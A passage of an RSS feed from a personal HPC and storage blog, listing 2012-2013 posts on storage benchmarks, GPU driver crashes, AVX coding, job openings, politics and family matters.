      <guid>https://blog.scalability.org/2013/02/a-week-into-the-ati-experiment/</guid>
      <description>So I was sick of the crashes in the NVidia driver. Nouveau wasn&amp;rsquo;t that good. Maybe someday it will be, but its really not that useful to me. So I opted for an ATI W5000 card. Initial install was rocky. The card used VESA drivers, and that was fine for initial boot. Accelerated drivers &amp;hellip; didn&amp;rsquo;t. They were slower than the VESA drivers. Window movements were jerky. It felt &amp;hellip; wrong &amp;hellip; somehow.</description>
    </item>
    
    <item>
      <title>You asked for it ... Riemann Zeta Function in javascript or node.js</title>
      <link>https://blog.scalability.org/2013/01/you-asked-for-it-riemann-zeta-function-in-javascript-or-node-js/</link>
      <pubDate>Wed, 30 Jan 2013 01:54:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/01/you-asked-for-it-riemann-zeta-function-in-javascript-or-node-js/</guid>
      <description>Ok, this was fun. Its been a while since I dusted off good old rzf &amp;hellip; ok, its been 12-ish days &amp;hellip; but I really have been wanting to try recoding it in javascript. As you might (or might not) remember, I asked questions (a very long time ago) about quality of generated code from a few different C compilers (and eventually the same code in Fortran). I rewote inner loops to hand optimize the compilation, and then recoded as SSE2.</description>
    </item>
    
    <item>
      <title>resonances</title>
      <link>https://blog.scalability.org/2013/01/resonances/</link>
      <pubDate>Tue, 22 Jan 2013 01:59:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/01/resonances/</guid>
      <description>This past December, 1 year to the day, and in fact, the very hour my wife was waking up from her surgery, we were at a Trans Siberian Orchestra concert. I like TSO quite a bit, and this had serious significance for us. Like the XKCD biopsiversary, this was our own little F-U to cancer. Not directly related to this, they played a rearranged version of a song on their newer CD.</description>
    </item>
    
    <item>
      <title>... and the positions are now, finally open ...</title>
      <link>https://blog.scalability.org/2013/01/and-the-positions-are-now-finally-open/</link>
      <pubDate>Fri, 18 Jan 2013 06:28:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/01/and-the-positions-are-now-finally-open/</guid>
      <description>See the Systems Engineering position here, and the System Build Technician position here. I&amp;rsquo;ll get these up on the InsideHPC.com site and a few others soon (tomorrow). But they are open now. For the Systems Engineering position, we really need someone in NYC area with a strong financial services background &amp;hellip; Doug made me take out the &amp;ldquo;able to leap tall buildings in a single bound&amp;rdquo; line, as well as the &amp;ldquo;must be able to talk customers through complex vi sessions on system configuration files while driving 70 mph on a highway.</description>
    </item>
    
    <item>
      <title>Massive.  Unapologetic.  Firepower.  24GB/s from siFlash</title>
      <link>https://blog.scalability.org/2013/01/massive-unapologetic-firepower-24gbs-from-siflash/</link>
      <pubDate>Wed, 16 Jan 2013 15:11:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/01/massive-unapologetic-firepower-24gbs-from-siflash/</guid>
      <description>Oh yes we did. Oh yes. We did. This is the fastest storage box we are aware of, in market. This is so far outside of ram, and outside of OS and RAID level cache &amp;hellip;
[root@siFlash ~]# fio srt.fio ... Run status group 0 (all jobs): READ: io=786432MB, aggrb=23971MB/s, minb=23971MB/s, maxb=23971MB/s, mint=32808msec, maxt=32808msec  This is 1TB read in 40 seconds or so. 1PB read in 40k seconds (1/2 a day).</description>
    </item>
    
    <item>
      <title>Doing something I&#39;ve not done in a long time ...</title>
      <link>https://blog.scalability.org/2013/01/doing-something-ive-not-done-in-a-long-time/</link>
      <pubDate>Wed, 16 Jan 2013 14:12:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/01/doing-something-ive-not-done-in-a-long-time/</guid>
      <description>&amp;hellip; buying a non-NVidia GPU product. Specifically the ATI FirePro W5000 for my desktop. I need to see if this is any more stable than the NVidia GTX series products. Feedback from customers running various flavors of Fermi, Kepler, Tesla, &amp;hellip; suggest that the problem that was reported to me, that I&amp;rsquo;ve run into, is fairly wide spread. It looks like a particular version of the driver (295.33) may not trip this problem.</description>
    </item>
    
    <item>
      <title>NVidia crashing x server madness</title>
      <link>https://blog.scalability.org/2013/01/nvidia-crashing-x-server-madness/</link>
      <pubDate>Tue, 15 Jan 2013 20:22:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/01/nvidia-crashing-x-server-madness/</guid>
      <description>I&amp;rsquo;ve been having a problem with a newly installed Mint 14 machine. A customer has been having this problem with a Scientific Linux 6.x machine. Some time after lighting up the machine, and usually after using an OpenGL application, the NVidia driver effectively hard locks, dumping error messages like this into the system logs.
[ 5444.863396] NVRM: Xid (0000:85:00): 13, 0003 00000000 00000000 00000ff4 0f000000 00000000 [ 5444.867446] NVRM: Xid (0000:85:00): 9, Channel 00000003 Instance 00000000 Intr 00000010 [ 5444.</description>
    </item>
    
    <item>
      <title>Playing with AVX</title>
      <link>https://blog.scalability.org/2013/01/playing-with-avx/</link>
      <pubDate>Tue, 15 Jan 2013 07:01:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/01/playing-with-avx/</guid>
      <description>I finally took some time from a busy schedule to play with AVX. I took my trusty old rzf code (Riemann Zeta function) and rewrote the time expensive inner loop in AVX primatives hooked to my C code. As a reminder, this code is a very simple sum reduction, and can be trivially parallelized (sum reduction). Vectorization isn&amp;rsquo;t as straightforward, and I found that compiler auto-vectorization doesn&amp;rsquo;t work well for it.</description>
    </item>
    
    <item>
      <title>Precision in languages</title>
      <link>https://blog.scalability.org/2013/01/precision-in-languages/</link>
      <pubDate>Mon, 14 Jan 2013 03:39:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/01/precision-in-languages/</guid>
      <description>I&amp;rsquo;ve talked about precision in previous posts quite a while ago. I had seen some interesting posts about Javascript, which suggested that it was not immune to the same issues &amp;hellip; if anything it was as problematic as most other languages, and maybe had a little less &amp;ldquo;guarding&amp;rdquo; the programmer against potential failure modes. This is not a terrible problem, I just found it amusing. Understand that I actually like Javascript.</description>
    </item>
    
    <item>
      <title>Will the US default soon?</title>
      <link>https://blog.scalability.org/2013/01/will-the-us-default-soon/</link>
      <pubDate>Mon, 14 Jan 2013 02:44:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/01/will-the-us-default-soon/</guid>
      <description>Quite possibly. We have a toxic mixture of overspending, insufficient revenue to cover the spending, and a borrowing limit. Several ideas have been floated over the last few weeks, including minting a $1T USD coin and depositing in the federal reserve. Thats $1012 USD folks. This is sort of like quantitative easing, aka printing more money, but far far worse. Anyone whom has ever been early into a startup and watched the value of their options get diluted with each new capital infusion knows exactly what this is.</description>
    </item>
    
    <item>
      <title>Game over, and thank you for playing</title>
      <link>https://blog.scalability.org/2013/01/game-over-and-thank-you-for-playing/</link>
      <pubDate>Sat, 12 Jan 2013 06:47:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/01/game-over-and-thank-you-for-playing/</guid>
      <description>Remember this?
Can we all just finally admit that not only isn&amp;rsquo;t it secure, but you can drive a semi truck through its security holes? Unfortunately, many of the kvm-over-ip stacks still use it. So you have these embedded web services things to talk to your java client, your horrifically insecure java client, to ship bytes out over the network to give you console. Can we all start demanding an end to these?</description>
    </item>
    
    <item>
      <title>Rethinking taking @americanexpress in the day job</title>
      <link>https://blog.scalability.org/2013/01/rethinking-taking-americanexpress-in-the-day-job/</link>
      <pubDate>Wed, 09 Jan 2013 19:12:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/01/rethinking-taking-americanexpress-in-the-day-job/</guid>
      <description>Long backstory which boils down to this: Every time a customer tries to pay with AMEX, we have to deal with a broken/borked verification system. None of our other credit card companies have issues, just AMEX. This time, they called up and questioned we were legitimate. Ok. They really did. I am going to start recording my calls with them, you know, for quality, and entertainment, purposes. After 5 minutes of dealing with the rep who called us, I asked for her manager.</description>
    </item>
    
    <item>
      <title>Tiburon updated with diskless CentOS 6.3 and Ubuntu 12.04 environments</title>
      <link>https://blog.scalability.org/2013/01/tiburon-updated-with-diskless-centos-6-3-and-ubuntu-12-04-environments/</link>
      <pubDate>Tue, 08 Jan 2013 23:11:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/01/tiburon-updated-with-diskless-centos-6-3-and-ubuntu-12-04-environments/</guid>
      <description>Our cluster/cloud OS environment now has modules for CentOS 6.x and Ubuntu 12.04. The latter is the LTS system. We&amp;rsquo;ve got some other tools/bits to setup for this, including working to see if we can build an ARM based PXE booting stack. We are working on making a number of cluster/cloud file system setups as absolutely painless as possible. More later.</description>
    </item>
    
    <item>
      <title>Comments on Javascript being the &#34;new&#34; Perl</title>
      <link>https://blog.scalability.org/2013/01/comments-on-javascript-being-the-new-perl/</link>
      <pubDate>Mon, 07 Jan 2013 08:06:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/01/comments-on-javascript-being-the-new-perl/</guid>
      <description>This has been making the rounds on Hacker News, Slashdot and others. The author&amp;rsquo;s central thesis is that Javascript has become something akin to the swiss army knife of cool programming, though its missing bits. He then compares this to Perl. He notes:
Hot is subjective, and in a very real sense, just last year, a teenager in his bedroom not only built a very cool tool, and company, but he sold it.</description>
    </item>
    
    <item>
      <title>Sad end to supercomputer in New Mexico</title>
      <link>https://blog.scalability.org/2013/01/sad-end-to-supercomputer-in-new-mexico/</link>
      <pubDate>Sun, 06 Jan 2013 16:47:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/01/sad-end-to-supercomputer-in-new-mexico/</guid>
      <description>I&amp;rsquo;ve written about this before, about 6 months ago. Basically, the Encanto supercomputer in New Mexico, is being disassembled. The parts appear to be headed to universities in New Mexico, so its not a complete loss, but they will still have to pay for maintenance and power/cooling. What I had written before
may be summarized as &amp;ldquo;there are no silver bullets&amp;rdquo; to economic growth and prosperity. There are no magic stimuli that automatically return profits atop principal for investment purposes.</description>
    </item>
    
    <item>
      <title>Is 2013 the year that 10GbE finally breaks out to mass adoption?</title>
      <link>https://blog.scalability.org/2013/01/is-2013-the-year-that-10gbe-finally-breaks-out-to-mass-adoption/</link>
      <pubDate>Thu, 03 Jan 2013 19:52:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/01/is-2013-the-year-that-10gbe-finally-breaks-out-to-mass-adoption/</guid>
      <description>For years, we&amp;rsquo;ve been hearing how this year (for all values of this year) is the year 10GbE takes off. I&amp;rsquo;ve commented on this a number of times, from the context of 10GbE breaking out in clusters, 10GbE killing off infiniband, etc. Looking back, these comments extend 6+ years into the past. The point I have always argued as being the most important, has been cost per port. Well, the technical press noted this today.</description>
    </item>
    
    <item>
      <title>More M&amp;A ... Nexsan snarfed by ... Imation?</title>
      <link>https://blog.scalability.org/2013/01/more-ma-nexsan-snarfed-by-imation/</link>
      <pubDate>Thu, 03 Jan 2013 04:20:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/01/more-ma-nexsan-snarfed-by-imation/</guid>
      <description>Ok, I didn&amp;rsquo;t quite see this one coming. Really. Honestly, I&amp;rsquo;ve not paid much attention to Imation in a fairly long time. I do remember tape drives and systems attached to parallel ports from them. I might even have one in my basement somewhere. Nexsan is an array vendor. For those not in the know, the array business is in a slow motion collapse, dumb arrays and associated storage targets aren&amp;rsquo;t a growth area.</description>
    </item>
    
    <item>
      <title>Nails it !!!</title>
      <link>https://blog.scalability.org/2013/01/nails-it/</link>
      <pubDate>Tue, 01 Jan 2013 22:15:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/01/nails-it/</guid>
      <description>Dave Barry in his usual fine form &amp;hellip; summarizes our year. The one take away should be &amp;hellip; WHAP</description>
    </item>
    
    <item>
      <title>I have joined the dark side</title>
      <link>https://blog.scalability.org/2013/01/i-have-joined-the-dark-side/</link>
      <pubDate>Tue, 01 Jan 2013 19:52:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/01/i-have-joined-the-dark-side/</guid>
      <description>There is now a Mac Mini on my desk. It is named neutrino. It is light. This isn&amp;rsquo;t getting rid of my Linux machine(s) by any stretch. And now having used neutrino for a day and change now, I note a few things. This list might make some howl in derision, but these are my observations.
 The default fonts and font setup on Mountain Lion is execrable. I mean, really really horrible.</description>
    </item>
    
    <item>
      <title>1 January 2013 : its over the cliff we go!</title>
      <link>https://blog.scalability.org/2013/01/1-january-2013-its-over-the-cliff-we-go/</link>
      <pubDate>Tue, 01 Jan 2013 16:10:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/01/1-january-2013-its-over-the-cliff-we-go/</guid>
      <description>[update] This pretty much says it all. [update 2] &amp;hellip; and &amp;hellip; they &amp;hellip; fold. A bad deal, about to be voted into law. As they said, elections have consequences. Whatever happens, they (WH and Senate) now own it. No cuts, just taxes. Even though our problem is way too much spending and mis-targeted tax increases.
 Less than 10 hours into the new year for us here in GMT-5. There is some aspect of humanity whereby many view this as a hopeful time, a chance to &amp;ldquo;begin anew&amp;rdquo;.</description>
    </item>
    
    <item>
      <title>Going over the (US fiscal) cliff</title>
      <link>https://blog.scalability.org/2012/12/going-over-the-us-fiscal-cliff/</link>
      <pubDate>Thu, 27 Dec 2012 03:02:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/12/going-over-the-us-fiscal-cliff/</guid>
      <description>[update] There&amp;rsquo;sa good piece on the impact upon the potential negotiations and its impact upon one party. As I noted below, any deal done between 1-Jan and now will be a bad deal. The only way to get real spending cuts is to go over the cliff, so lets do this. I don&amp;rsquo;t care about the political fortunes impact. I care about the long term impact upon the country of out of control spending.</description>
    </item>
    
    <item>
      <title>This has been another banner year for the day job</title>
      <link>https://blog.scalability.org/2012/12/this-has-been-another-banner-year-for-the-day-job/</link>
      <pubDate>Sat, 22 Dec 2012 16:42:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/12/this-has-been-another-banner-year-for-the-day-job/</guid>
      <description>For the last 4 years, we&amp;rsquo;ve had significant year over year growth. We set records every year. 2 years ago was a barn stormer of a year. Last year reset the definition of barn storming for us. And this year. Yes, this year. I&amp;rsquo;ve hinted that we were following a hard/fast growth path. Some folks who read this know the trajectory we are on. 38% growth over last year. Which was 60% growth over the year before.</description>
    </item>
    
    <item>
      <title>OT: Helping a good cause</title>
      <link>https://blog.scalability.org/2012/12/ot-helping-a-good-cause/</link>
      <pubDate>Sat, 22 Dec 2012 15:42:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/12/ot-helping-a-good-cause/</guid>
      <description>A few months ago,we had a new addition to our family. This is Captain, and he is what is called a rescue dog. The organization that rescued him doesn&amp;rsquo;t have that as their primary mission, they build shelters and provide food for dogs whom are chained up outside. Our Captain was one such. He was badly abused, and 4 months later, has major trust issues, and bad nightmares. He has recovered from the physical abuse.</description>
    </item>
    
    <item>
      <title>SC12 video</title>
      <link>https://blog.scalability.org/2012/12/sc12-video/</link>
      <pubDate>Thu, 20 Dec 2012 02:21:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/12/sc12-video/</guid>
      <description>If you haven&amp;rsquo;t figured it out, I&amp;rsquo;ve been busy. This is the very good sort of busy. Rich at InsideHPC.com (you read this, right? Regularly? Right? You should if you don&amp;rsquo;t) did a whole set of interviews at SC12. There&amp;rsquo;s some very cool stuff in them. Here&amp;rsquo;s ours. I&amp;rsquo;ll tell you the funny stuff at the end.
So this is like 8:30am. I&amp;rsquo;ve not had my coffee, so my brain is stuck in POST mode, and I am subject to race conditions (mouth stumbling ahead of single brain cell that might be awake).</description>
    </item>
    
    <item>
      <title>sparse file WTFs on Linux</title>
      <link>https://blog.scalability.org/2012/12/sparse-file-wtfs-on-linux/</link>
      <pubDate>Wed, 19 Dec 2012 21:41:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/12/sparse-file-wtfs-on-linux/</guid>
      <description>Create a big file &amp;hellip;
[root@jr5-lab test]# dd if=/dev/zero of=big.file.1 bs=1 count=1 seek=1P 1+0 records in 1+0 records out 1 byte (1 B) copied, 0.000159797 seconds, 6.3 kB/s [root@jr5-lab test]# ls -alF total 4 drwxrwxrwx 2 root root 23 Dec 19 17:33 ./ drwxr-xr-x 6 root root 73 Nov 6 11:07 ../ -rw-r--r-- 1 root root 1125899906842625 Dec 19 17:33 big.file.1 [root@jr5-lab test]# ls -alFh total 4.0K drwxrwxrwx 2 root root 23 Dec 19 17:33 .</description>
    </item>
    
    <item>
      <title>Microsoft OSes will likely be losing OpenMPI support</title>
      <link>https://blog.scalability.org/2012/12/microsoft-oses-will-likely-be-losing-openmpi-support/</link>
      <pubDate>Tue, 18 Dec 2012 16:13:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/12/microsoft-oses-will-likely-be-losing-openmpi-support/</guid>
      <description>I&amp;rsquo;d been holding off on posting anything on this for a while to see if any group steps up to support it. It looks like this is simply not happening. One shouldn&amp;rsquo;t infer anything about the Microsoft platforms w.r.t. HPC as a result of this one case. However, in light of the absorption of the HPC group into the larger server group, and other reorganizations, its hard to draw a positive conclusion about the longevity of Microsoft&amp;rsquo;s HPC efforts.</description>
    </item>
    
    <item>
      <title>The downside to social media</title>
      <link>https://blog.scalability.org/2012/12/the-downside-to-social-media/</link>
      <pubDate>Mon, 17 Dec 2012 06:26:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/12/the-downside-to-social-media/</guid>
      <description>&amp;hellip; there are SOOO MANY things to update, pay attention to &amp;hellip; Yeah, its heaven for those of us blessed with ADHD (squirrel!), but it takes away time from important things. And of course, there is at least a little irony in blogging about this and having it auto-tweeted. The world doesn&amp;rsquo;t need more social media.</description>
    </item>
    
    <item>
      <title>Wondering aloud</title>
      <link>https://blog.scalability.org/2012/12/wondering-aloud-2/</link>
      <pubDate>Mon, 17 Dec 2012 06:06:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/12/wondering-aloud-2/</guid>
      <description>Call this a hypothesis based upon observation. Its harder for smart people to admit they are incorrect about something, than it might be for the population as a whole. My rationale works like this &amp;hellip; the smarter you are, the more defensive you are of that &amp;lsquo;status&amp;rsquo; if you will, and so you tend to act in a way to reinforce prior decisions, regardless of their actual (quantifiable) correctness. That is, you are more afraid of the consequences of admitting to being wrong, as compared to actually being wrong.</description>
    </item>
    
    <item>
      <title>Its getting near time for the obligatory Led Zeppelin reference ...</title>
      <link>https://blog.scalability.org/2012/12/its-getting-near-time-for-the-obligatory-led-zeppelin-reference/</link>
      <pubDate>Sun, 16 Dec 2012 17:09:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/12/its-getting-near-time-for-the-obligatory-led-zeppelin-reference/</guid>
      <description>Last year, it was a What is and what should never be. I look some liberal artistic license with the title, and altered its meaning. But the song itself is about thinking about a brighter future.
My family was just getting started down the path of a cancer diagnosis and treatment. My wife was diagnosed, and without explaining precisely why, the doctors urged us to move rapidly. I think we understand now, why they did.</description>
    </item>
    
    <item>
      <title>That was the easiest update ... evuh ...</title>
      <link>https://blog.scalability.org/2012/12/that-was-the-easiest-update-evuh/</link>
      <pubDate>Sun, 16 Dec 2012 15:52:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/12/that-was-the-easiest-update-evuh/</guid>
      <description>Wordpress before 3.5 to Wordpress 3.5. 1 button click. 1. Count em. 1. Uno. No dos. I am going to take that lesson to heart. One button.</description>
    </item>
    
    <item>
      <title>Updated DeltaV4 quick benchies</title>
      <link>https://blog.scalability.org/2012/12/updated-deltav4-quick-benchies/</link>
      <pubDate>Tue, 11 Dec 2012 05:48:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/12/updated-deltav4-quick-benchies/</guid>
      <description>Streaming reads and writes. Far beyond memory/cache/&amp;hellip; all spinning disk. Remember, this is our &amp;ldquo;slow&amp;rdquo; storage.
[root@dv4-1 ~]# df -h /data Filesystem Size Used Avail Use% Mounted on /dev/md2 55T 65G 55T 1% /data Run status group 0 (all jobs): WRITE: io=65505MB, aggrb=1467.7MB/s, minb=1467.7MB/s, maxb=1467.7MB/s, mint=44633msec, maxt=44633msec Run status group 0 (all jobs): READ: io=65412MB, aggrb=1814.5MB/s, minb=1814.5MB/s, maxb=1814.5MB/s, mint=36050msec, maxt=36050msec  </description>
    </item>
    
    <item>
      <title>I am guessing they don&#39;t get it ...</title>
      <link>https://blog.scalability.org/2012/12/i-am-guessing-they-dont-get-it/</link>
      <pubDate>Mon, 10 Dec 2012 19:26:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/12/i-am-guessing-they-dont-get-it/</guid>
      <description>I wrote this some time ago.
This is even more true this year than last. So when people call me up and try to tell me of the glamour of working for another company, they need to take this into consideration. But they don&amp;rsquo;t. So they call all the extensions on our phone. And leave messages for everyone. Um &amp;hellip; yeah. We are growing, much faster than I had anticipated. We are actually on a real live hockey stick revenue curve.</description>
    </item>
    
    <item>
      <title>Our cloudy future</title>
      <link>https://blog.scalability.org/2012/12/our-cloudy-future/</link>
      <pubDate>Sun, 02 Dec 2012 13:46:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/12/our-cloudy-future/</guid>
      <description>So I just dealt with a hack on the @sijoe twitter account. And I went through a process of re-locking everything down. What occurs to me, is that this is our cloudy future. Where resources could be effectively stolen from us, say CPU cycles and storage, not merely hacking useless social media sites, by fairly determined hacking groups. Think about this for a moment. You have a large allocation on EC2 for some reason, and your account gets hacked.</description>
    </item>
    
    <item>
      <title>Well, that was fun</title>
      <link>https://blog.scalability.org/2012/12/well-that-was-fun/</link>
      <pubDate>Sun, 02 Dec 2012 12:30:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/12/well-that-was-fun/</guid>
      <description>Somehow/somewhere, the @sijoe twitter account was compromised, and a bad tweet generated. I deleted the tweet. Then revoked all access to twitter from all accounts. Then made sure I&amp;rsquo;ve got two factor authentication up everywhere possible. Then changed all passwords on all accounts. Are we having fun yet? Somehow, I have a sense that this is our computational future. I&amp;rsquo;ll elaborate on this shortly. Let me finish hooking up the newly re-secured bits to each other (well, a more limited version of this &amp;hellip;) And no, I wasn&amp;rsquo;t able to identify the culprit vector.</description>
    </item>
    
    <item>
      <title>What we&#39;ve been working on for the past several months</title>
      <link>https://blog.scalability.org/2012/12/what-weve-been-working-on-for-the-past-several-months/</link>
      <pubDate>Sun, 02 Dec 2012 00:36:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/12/what-weve-been-working-on-for-the-past-several-months/</guid>
      <description>&amp;hellip; I still can&amp;rsquo;t talk about it publicly, until everything is live, and I get the OK. But it is awesome, and its a pleasure to work with the large extended team we are working with. And yes, this is killing me. I love to talk about cool stuff.</description>
    </item>
    
    <item>
      <title>I can&#39;t believe its been one year since I wrote this</title>
      <link>https://blog.scalability.org/2012/11/i-cant-believe-its-been-one-year-since-i-wrote-this/</link>
      <pubDate>Sat, 01 Dec 2012 01:28:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/11/i-cant-believe-its-been-one-year-since-i-wrote-this/</guid>
      <description>This post.
That was written in the late evening of the 29th of November 2011. Today is the 1 year anniversary of that visit. Chris Samuel (@chris_bloke) and his wife went through a similar event somewhat before we did. And he pointed out this XKCD to everyone on his twitter feed. We got our surgical slot quickly, I believe we were given priority. Not sure why, but the post-operative analysis indicated that the cancer had broken out of the duct, and was growing rapidly.</description>
    </item>
    
    <item>
      <title>Initial results for 60 bay unit running a software RAID</title>
      <link>https://blog.scalability.org/2012/11/initial-results-for-60-bay-unit-running-a-software-raid/</link>
      <pubDate>Tue, 27 Nov 2012 04:30:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/11/initial-results-for-60-bay-unit-running-a-software-raid/</guid>
      <description>Our new JackRabbit tightly coupled storage and computing unit is on the test track, and about to go out the door to a customer. Need a few minutes with it, after quick tuning to generate some performance data. This is a single 4U server unit with 1/4 PB within it. Streaming 1TB from disk. This is using our tuned software RAID6. Our hardware accelerated RAID results will be generated later in the next batch of tests with new units we are building.</description>
    </item>
    
    <item>
      <title>Learning limits of Linux distribution infrastructure</title>
      <link>https://blog.scalability.org/2012/11/learning-limits-of-linux-distribution-infrastructure/</link>
      <pubDate>Mon, 26 Nov 2012 13:48:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/11/learning-limits-of-linux-distribution-infrastructure/</guid>
      <description>Its only when you stress a distribution infrastructure that you truly see its limits. And as often as not, the fail winds up being widespread. Our new 60 bay JackRabbit unit with CentOS 6.3 on it &amp;hellip; and this is not a bash at CentOS, they do a great job rebuilding the Red Hat distribution without the copyrighted bits &amp;hellip; has a number of software RAID elements on it. 9 in the current test.</description>
    </item>
    
    <item>
      <title>ICL (IPMI Console Logger) update</title>
      <link>https://blog.scalability.org/2012/11/icl-ipmi-console-logger-update/</link>
      <pubDate>Mon, 19 Nov 2012 01:49:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/11/icl-ipmi-console-logger-update/</guid>
      <description>Ok, this took me forever to get this done. But, I&amp;rsquo;ve had inquiries from a large number of people/companies, so here it goes: Have a looksy at the repo here This is the older code, with a single host at a time (plumbing is for many many hosts at once), with no triggers. That code is about a week away (I don&amp;rsquo;t like committing broken code). For what its worth, this is going to be used at scale in one of our projects.</description>
    </item>
    
    <item>
      <title>Controversy in the kernel</title>
      <link>https://blog.scalability.org/2012/11/controversy-in-the-kernel/</link>
      <pubDate>Sun, 18 Nov 2012 17:26:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/11/controversy-in-the-kernel/</guid>
      <description>Referring to this article, it appears that there is some issue with an important subsystem in the Linux kernel. The SCSI target code, specifically the new implementation pulled in by James Bottomley is the LIO framework based upon work of Nicolas Bellinger and Rising Tide Systems. This was chosen over the SCST implementation, which continues to soldier on. We did have a dog in that race, and would have preferred to have seen SCST included due to our familiarity with it.</description>
    </item>
    
    <item>
      <title>Post SC12:  some thoughts and updates</title>
      <link>https://blog.scalability.org/2012/11/post-sc12-some-thoughts-and-updates/</link>
      <pubDate>Sun, 18 Nov 2012 05:52:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/11/post-sc12-some-thoughts-and-updates/</guid>
      <description>That was our best SCxy show. Ever. Inclusive of all 17-ish years I&amp;rsquo;ve attended (getting to be something of a geezer I guess). The 60 bay JackRabbit system got lots of attention. That we are putting the Calxeda backplane and energy cards in, come January time frame, brought many people in to talk about this. Big data was a one of the huge topics. I&amp;rsquo;ve been saying Big Data is not just Hadoop.</description>
    </item>
    
    <item>
      <title>SC12 panel on big data</title>
      <link>https://blog.scalability.org/2012/11/sc12-panel-on-big-data/</link>
      <pubDate>Sat, 17 Nov 2012 16:36:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/11/sc12-panel-on-big-data/</guid>
      <description>Listen to their definition between 3 and 6 minutes in.
The storage performance and IO performance, and networking is extraordinarily critical to these problems. Which has been the set of problems we&amp;rsquo;ve been focusing on for a long time. Also worth noting that Addison Snell nails it on HPC and big data relationships. They are debating definitions and other aspects, but at the end of the day, the idea is that HPC has been a set of techniques, designs, and platforms upon which we&amp;rsquo;ve been banging on big data problems for decades.</description>
    </item>
    
    <item>
      <title>And its over till SC13 ...</title>
      <link>https://blog.scalability.org/2012/11/and-its-over-till-sc13/</link>
      <pubDate>Fri, 16 Nov 2012 06:58:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/11/and-its-over-till-sc13/</guid>
      <description>Upfront: This was the best SC conference we have ever participated in. From an interest level, traffic level, and various meetings with partners, customers, and others. And to the folks who might be reading this whom we missed, or had to cut short conversations due to timing, please feel free to call/email us. We are reachable via the usual methods. Everyone marveled at the 60 bay chassis. Oddly enough, I never had time to set up the benchmarks on it.</description>
    </item>
    
    <item>
      <title>SC12 day 1</title>
      <link>https://blog.scalability.org/2012/11/5504/</link>
      <pubDate>Wed, 14 Nov 2012 06:33:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/11/5504/</guid>
      <description>Ok, beobash rocked. As usual, Lara at Xandmarketing, Doug Eadline did an absolutely awesome job. For those I bumped into, hello again. I apologize if I didn&amp;rsquo;t spend more time with you &amp;hellip; especially my readers &amp;hellip; I was operating on fumes at that point. Please don&amp;rsquo;t hesitate to introduce yourself during the day at the booth (4154) at SC12. Got up early, got into the booth, did an interview video with Rich B at InsideHPC.</description>
    </item>
    
    <item>
      <title>On the test track:  New JackRabbit, open the throttle wide ...</title>
      <link>https://blog.scalability.org/2012/11/on-the-test-track-new-jackrabbit-open-the-throttle-wide/</link>
      <pubDate>Wed, 07 Nov 2012 06:53:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/11/on-the-test-track-new-jackrabbit-open-the-throttle-wide/</guid>
      <description>I know, I know, I really should wait until the drive build is done. I know I should do that. [root@Mj?lnir ~]# df -h Filesystem Size Used Avail Use% Mounted on /dev/md0 89G 6.8G 77G 9% / tmpfs 127G 0 127G 0% /dev/shm /dev/sdc 48T 393G 47T 1% /data/3 /dev/sdb 48T 395G 47T 1% /data/2 /dev/sdd 33T 367G 33T 2% /data/4 /dev/sda 48T 374G 47T 1% /data/1 I called it Mj?</description>
    </item>
    
    <item>
      <title>The joys of running one&#39;s own mail server</title>
      <link>https://blog.scalability.org/2012/11/the-joys-of-running-ones-own-mail-server/</link>
      <pubDate>Mon, 05 Nov 2012 23:41:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/11/the-joys-of-running-ones-own-mail-server/</guid>
      <description>Minor issue. We changed IP addresses at work recently. A larger block of public facing IPs for more functionality. And in doing so, we updated almost everything correctly. Yes, almost everything. Almost. Everything. The one, minor &amp;hellip; trivial &amp;hellip; thing we left unchanged &amp;hellip; broke our support site sending reply emails correctly. They were rejected about 50% of the time, as they came in on the wrong port/ip. So for the last week we&amp;rsquo;ve been sending extra emails.</description>
    </item>
    
    <item>
      <title>Heavily armed rabbits</title>
      <link>https://blog.scalability.org/2012/11/heavily-armed-rabbits/</link>
      <pubDate>Mon, 05 Nov 2012 19:40:07 +0000</pubDate>
      
